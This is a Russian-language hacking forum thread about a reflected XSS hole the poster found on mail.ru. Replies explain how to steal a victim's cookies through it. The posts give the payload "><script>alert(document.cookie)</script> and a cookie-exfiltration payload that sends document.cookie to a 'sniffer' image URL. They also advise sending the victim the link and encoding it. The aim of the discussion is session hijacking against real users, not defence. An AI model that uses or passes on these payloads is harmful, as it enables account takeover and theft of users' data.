|
пассивная xss на mail.ru, вопрос
Я тут лазил по mail.ru искал XSS, вылитило следующее окно. На то, что было забито в скрипт как предупреждение это не похоже. Так, что это кто нить знает ?
http://img12.imageshack.us/img12/7390/111jcm.th.jpg |
>>Так, что это кто нить знает ?
пасвная XSS |
Скрипт следующий: "><script>alert(XSS)</script>, а выскочела такая бойда почему ?
|
ты чет напутал!
или скрипт нетот пихнул и незаметил... То что на картинке - результат действия следуйщего скриптк: Код:
"><script>alert(document.cookie)</script> |
Блин, да ты прав я именно этим скриптом и пробовал.
А через эту уизвимость куки можно пробивать ? |
просиш жертву зделать также как и ты зделал с етим скриптом "><script>alert(document.cookie)</script>
|
мочишь xD, искать xss и даже не знать что это и как заюзать, тебе сюда
ну раз спросил то отвечу - да, угнать кукисы можно |
Цитата:
она посмотрит на свои куки=/////// ТС кидаеш жертве линк с яваскриптом в котором будет (сниффер+document.cookie) и жди куки) например что то типа: '><script>img = new Image();img.src="снифферкартинко"+d ocument.cookie;</script> |
Спасибо, я тока учусь ))
|
только закодировать не забудь
|
| Время: 16:31 |